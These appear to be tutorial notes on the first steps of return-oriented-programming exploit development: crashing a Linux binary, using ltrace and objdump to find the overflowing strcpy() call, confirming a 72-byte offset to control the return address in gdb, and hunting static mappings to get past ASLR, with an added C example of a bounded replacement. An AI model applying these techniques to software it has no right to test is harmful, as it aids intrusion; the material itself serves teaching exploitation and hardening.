ROP: Finding the vulnerable function

  • At this point you have been able to generate a crash on a Linux binary. Before progressing, we need to find the function that causes the crash.

# creating the crash (the closing quote must come before the redirect)
python3 -c 'print("A"*100)' > temp.txt
./binary temp.txt

Segmentation fault
  • use ltrace to see which library call is made immediately before the crash

ltrace ./binary temp.txt 2>&1 | grep SIGSEGV -B1
7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b
--snip--
  • we can see that strcpy() is the last call before the signal, so it is the call that overflows the buffer and causes the crash

  • use objdump to see where in the code segment strcpy() is called.

  • Look at the GOT of the program and grep for strcpy()

  • Then use the objdump tool to specifically query the .plt segment to see where the address in the GOT is referenced.

  • After obtaining the PLT address, use objdump once more, this time on the .text segment, and grep for the address shown in the PLT

objdump -R ./binary | grep strcpy
0304b00a R_386_JUMP_SLOT    strcpy
objdump -j .plt -d binary | grep b00a
70482b7:  ff 25 0a b0 04 03 jmp  *0x0304b00a 
objdump -j .text -d binary | grep 82b7 -B2 -A2
# in the surrounding instructions you will see:
#   the size of the vulnerable buffer
#   the call to strcpy@plt
#   a ret, which is a good spot for a breakpoint to check
#   whether your payload was successfully copied into memory
  • to validate your finding, check that your buffer analysis (72 bytes to the saved return address) was correct

python3 -c 'print("A"*72 + "BBBB")' > temp.txt
gdb ./binary
run temp.txt
Program received signal SIGSEGV, Segmentation fault
0x42424242 in ?? ()
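To make the finding concrete, here is an added example in C (not the page's binary, whose source the notes do not show): the strcpy()-into-fixed-buffer pattern that produces the ltrace line above, beside a bounded replacement that rejects oversized input. BUF_SIZE = 72 is assumed from the offset found above.

```c
#include <stdio.h>
#include <string.h>

/* Buffer size matching the 72-byte offset the crash analysis above arrived
 * at (assumed here; the page does not show the binary's source). */
#define BUF_SIZE 72

/* Vulnerable pattern: the call ltrace reports just before SIGSEGV.
 * strcpy() copies until the input's NUL, so any input of BUF_SIZE bytes
 * or more runs past buf into the saved frame data. Only ever call it
 * with short input when running this example. */
int vulnerable_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);             /* no length check */
    return (int)strlen(buf);
}

/* Hardened form: locate the terminator within the buffer's capacity first
 * and refuse input that would not fit, rather than truncating silently. */
int safe_copy(const char *input) {
    char buf[BUF_SIZE];
    const char *nul = memchr(input, '\0', BUF_SIZE);
    if (nul == NULL)
        return -1;                  /* strlen(input) >= BUF_SIZE: rejected */
    memcpy(buf, input, (size_t)(nul - input) + 1);
    return (int)(nul - input);
}

/* Helper: exercise safe_copy() with a constructed run of n 'A' bytes,
 * the same shape of input the python3 one-liners above generate. */
int safe_copy_of_n_bytes(size_t n) {
    char input[256];
    if (n >= sizeof input)
        return -2;
    memset(input, 'A', n);
    input[n] = '\0';
    return safe_copy(input);
}

int main(void) {
    printf("safe_copy, 71 bytes: %d\n", safe_copy_of_n_bytes(71));   /* 71 */
    printf("safe_copy, 72 bytes: %d\n", safe_copy_of_n_bytes(72));   /* -1 */
    printf("safe_copy, 100 bytes: %d\n", safe_copy_of_n_bytes(100)); /* -1 */
    return 0;
}
```

Under ltrace the hardened build shows memcpy() with an explicit length instead of an unbounded strcpy(), and the 100-byte input is rejected before anything is written to the stack buffer.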

Find static addresses

  • We need to find static memory locations as ASLR will be enabled on modern systems.

  • There may be static regions that do not utilize ASLR

  • There could be static mappings due to any third party programs that get mapped into our program

  • use ltrace to find the static mappings

ltrace ./binary temp.txt 2>&1 | egrep -i 'mmap|open'
  • look for any shared object that is mmap'd into the binary

  • should see an open() call followed by a mmap() with a memory address passed into mmap()
